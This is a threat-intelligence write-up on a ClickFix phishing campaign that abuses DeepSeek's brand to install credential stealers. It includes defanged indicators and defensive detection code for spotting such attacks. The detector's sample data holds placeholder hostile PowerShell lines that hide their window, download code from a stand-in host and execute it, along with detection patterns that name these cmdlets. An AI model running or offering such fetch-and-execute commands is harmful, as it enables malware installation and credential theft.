CloudSEK Uncovers ClickFix Phishing Campaign Targeting Users
CloudSEK’s Threat Intelligence Team has uncovered a dangerous ClickFix phishing campaign that weaponizes DeepSeek’s brand name to deceive users and install credential-stealing malware.
The ‘DeepSeek ClickFix Scam’: How It Works
Cybercriminals have set up a fake domain (deepseekcaptcha[.]top) that mimics a DeepSeek verification page, tricking users into clicking a fraudulent “captcha verification” button. Once clicked, the page automatically executes a PowerShell command, infecting the victim’s device with Vidar Stealer and Lumma Stealer malware.
The malware exfiltrates credentials, financial data, and session tokens, specifically targeting Steam and Telegram users. The attackers have also leveraged Cloudflare hosting to evade AI-based security detections, keeping the domain active and undetected for a prolonged period.
Key Findings from CloudSEK’s Research:
- Fake DeepSeek-branded captcha page tricks users into downloading malware.
- ClickFix attack method deploys a PowerShell command to install Vidar Stealer.
- Lumma Stealer and Vidar Stealer are actively being distributed.
- Cloudflare is used to mask the malicious domain and prevent early detection.
- The phishing attack primarily targets AI users and communities reliant on DeepSeek.
- Malware campaign is hosted on IP 147.45.44[.]209, where various scripts and executables were discovered.
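Whatever the lure looks like in the browser, what lands in endpoint telemetry is an interpreter (PowerShell, cmd, mshta) started from the desktop shell or a browser with switches that hide the window and download and run code. The following detection sketch is an added example, not CloudSEK's tooling: it scores constructed process-creation events in an assumed JSON-lines schema (fields ts, host, parent, image, cmdline; map them to your own EDR or Sysmon Event ID 1 export) and flags the ClickFix shape while leaving an administrator's policy-bypass script alone. The sample command lines are placeholders pointing at a non-routable .invalid host and are not the campaign's command.

```python
"""Flag ClickFix-style interpreter launches in process-creation telemetry.

Added example, not CloudSEK's code. The event fields (ts, host, parent,
image, cmdline) are an assumed JSON-lines export; adapt them to your schema.
"""
import json
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample events. Command lines are placeholders (example.invalid,
# dummy base64) and do not reproduce the campaign's PowerShell command.
SAMPLE_EVENTS = r"""
{"ts":"2025-01-01T00:00:01Z","host":"WS-01","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -w hidden -nop -c \"iwr http://example.invalid/v | iex\""}
{"ts":"2025-01-01T00:00:02Z","host":"WS-02","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\patch.ps1"}
{"ts":"2025-01-01T00:00:03Z","host":"WS-01","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\""}
{"ts":"2025-01-01T00:00:04Z","host":"WS-03","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c powershell -w hidden -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="}
"""

# A ClickFix lure ends with the victim's own shell or browser starting an
# interpreter, so the parent is interactive rather than a service or scheduler.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# Each indicator is a command-line trait; several together make the pattern.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("profile_or_policy_bypass",
     re.compile(r"-nop\b|-noprofile\b|-ep\s+bypass\b|-executionpolicy\s+bypass\b", re.I)),
    ("download_cmdlet",
     re.compile(r"(?<![\w-])(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                r"downloadstring|downloadfile|net\.webclient)(?![\w-])", re.I)),
    ("inline_execution", re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", re.I)),
    ("encoded_command", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
]


@dataclass(frozen=True)
class Finding:
    ts: str
    host: str
    parent: str
    indicators: tuple
    cmdline: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> Optional[Finding]:
    """Return a Finding when the event matches the ClickFix launch pattern."""
    if _basename(event["image"]) not in INTERPRETERS:
        return None
    hits = tuple(name for name, rx in INDICATORS if rx.search(event["cmdline"]))
    parent = _basename(event["parent"])
    # Two traits from an interactive parent is the ClickFix shape; demand three
    # for any other parent so ordinary admin scripts stay quiet.
    if (parent in INTERACTIVE_PARENTS and len(hits) >= 2) or len(hits) >= 3:
        return Finding(event["ts"], event["host"], parent, hits, event["cmdline"])
    return None


def scan_events(jsonl: str) -> list:
    """Score every non-empty JSON line and keep the findings in input order."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            finding = score_event(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.ts} {f.host} parent={f.parent} indicators={','.join(f.indicators)}")
```

On the constructed sample this flags the two explorer.exe-spawned launches (hidden window plus download-and-execute, and hidden window plus an encoded command) and ignores both a bare PowerShell console and the cmd.exe-launched maintenance script, which shows why the rule weighs the parent process rather than any single switch.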
The Growing Threat: AI’s Popularity Fuels Cybercrime
The DeepSeek ClickFix scam is part of a larger trend in cybercrime where attackers leverage AI’s rapid adoption to exploit user trust in technology.
CloudSEK researchers have observed that AI-driven scams are becoming more targeted and deceptive, bypassing traditional security mechanisms. The use of fake verification pages, social media integration, and Cloudflare masking techniques makes these attacks harder to detect and neutralize.
Cybersecurity experts emphasize that AI-driven phishing campaigns are evolving, making it harder to detect using traditional security tools.
How to Stay Safe: CloudSEK’s Recommendations
- Double-Check Website URLs: Always verify if a website is legitimate before entering credentials.
- Beware of Fake Captcha Pages: AI platforms do not require repeated captchas. If prompted, proceed with caution.
- Enable Multi-Factor Authentication (MFA): Even if credentials are stolen, MFA can prevent unauthorized access.
- Use Advanced Anti-Phishing Protection: Organizations should deploy email filtering solutions and domain monitoring tools to detect phishing sites early.
- Regularly Update Software: Ensure that your device and security software are up to date so that known vulnerabilities are patched.
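The domain-monitoring recommendation above is concrete enough to sketch. The block below is an added example, not CloudSEK's tooling: it scores entries from a constructed newly-observed-domain feed against a protected brand token, combining a keyword or near-miss match on the brand with lure words such as "captcha" and "verify", a risky top-level domain, and the brand appearing as a subdomain of someone else's registrable domain. The allowlist, lure words and TLD set are assumptions to tune for your own organisation, and the "last two labels" rule for the registrable domain is a simplification that ignores the public suffix list. Only deepseekcaptcha[.]top is taken from the report; the other feed entries are made up, and defanged entries are accepted as input.

```python
"""Flag brand-abusing lookalike domains in a newly-observed-domain feed.

Added example, not CloudSEK's tooling. The allowlist, lure words and risky
TLDs are assumptions; the registrable-domain rule ignores the public suffix list.
"""
from dataclasses import dataclass
from difflib import SequenceMatcher

BRAND = "deepseek"
LEGIT_REGISTRABLE = {"deepseek.com"}                                 # assumption
LURE_WORDS = ("captcha", "verif", "login", "secure", "auth", "human", "check")
RISKY_TLDS = {"top", "xyz", "icu", "click", "cfd", "sbs", "shop"}    # assumption
LOOKALIKE_THRESHOLD = 0.85

# Constructed feed: deepseekcaptcha[.]top is from the report, the rest are
# made-up positives and negatives, some written in defanged form.
SAMPLE_FEED = """
deepseekcaptcha[.]top
deepseek.com
chat.deepseek.com
deepseek.com.verify-login.xyz
deepseak-verify[.]com
openai-captcha[.]top
"""


@dataclass(frozen=True)
class Verdict:
    domain: str
    similarity: float
    reasons: tuple


def refang(entry: str) -> str:
    """Normalise a feed line: lower-case, strip the trailing dot, undo defanging."""
    return entry.strip().lower().rstrip(".").replace("[.]", ".").replace("(.)", ".")


def registrable(domain: str) -> str:
    """Last two labels; a simplification that ignores the public suffix list."""
    return ".".join(domain.split(".")[-2:])


def brand_similarity(label: str) -> float:
    """Best SequenceMatcher ratio between the brand and a brand-sized window of the label."""
    best = 0.0
    for width in (len(BRAND) - 1, len(BRAND), len(BRAND) + 1):
        for start in range(max(1, len(label) - width + 1)):
            best = max(best, SequenceMatcher(None, BRAND, label[start:start + width]).ratio())
    return best


def assess(entry: str):
    """Return a Verdict for a brand-abusing domain, or None when it is clean or allowlisted."""
    domain = refang(entry)
    if registrable(domain) in LEGIT_REGISTRABLE:
        return None
    labels = domain.split(".")
    host_labels, tld = labels[:-1], labels[-1]
    similarity = max(brand_similarity(label) for label in host_labels)
    reasons = []
    if BRAND in "".join(host_labels):
        reasons.append("brand_keyword")
    elif similarity >= LOOKALIKE_THRESHOLD:
        reasons.append("brand_lookalike")
    else:
        return None                       # no brand reference: not our problem
    if any(word in label for label in host_labels for word in LURE_WORDS):
        reasons.append("lure_keyword")
    if tld in RISKY_TLDS:
        reasons.append("risky_tld")
    if BRAND in "".join(host_labels[:-1]):
        reasons.append("brand_in_subdomain")   # brand.com.<attacker-domain> shape
    return Verdict(domain, round(similarity, 3), tuple(reasons))


def monitor(feed: str) -> list:
    """Assess every non-empty feed line and keep the verdicts in input order."""
    return [v for v in (assess(line) for line in feed.splitlines() if line.strip()) if v]


if __name__ == "__main__":
    for v in monitor(SAMPLE_FEED):
        print(f"{v.domain:32} sim={v.similarity:.3f} {','.join(v.reasons)}")
```

The windowed similarity is what catches a one-letter swap such as deepseak-verify[.]com without flagging every domain that happens to contain a lure word, while the allowlist check on the registrable domain keeps the genuine site and its subdomains out of the alert queue.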
Final Thoughts: AI Security is a Shared Responsibility
As AI continues to transform industries, its security risks must not be ignored. The DeepSeek ClickFix Scam is a wake-up call for businesses, researchers, and end-users to adopt proactive cybersecurity measures.